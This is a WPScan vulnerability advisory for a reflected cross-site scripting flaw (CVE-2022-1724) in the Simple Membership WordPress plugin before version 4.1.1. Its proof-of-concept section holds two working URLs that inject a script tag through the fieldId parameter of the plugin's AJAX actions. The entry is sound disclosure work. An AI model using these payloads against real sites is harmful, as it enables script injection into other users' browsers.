WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Simple Membership < 4.1.1 - Reflected Cross-Site Scripting

Description

The plugin does not properly sanitise and escape parameters before outputting them back in AJAX actions, leading to Reflected Cross-Site Scripting

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

https://example.com/wp-admin/admin-ajax.php?action=swpm_validate_user_name&fieldId=%22%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

Affects Plugins

simple-membership
Fixed in version 4.1.1

References

CVE
CVE-2022-1724

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
96a0a667-9c4b-4ea6-b78a-0681e9a9bbae

Timeline

Publicly Published

2022-05-23 (about 2 months ago)

Added

2022-05-23 (about 2 months ago)

Last Updated

2022-05-23 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin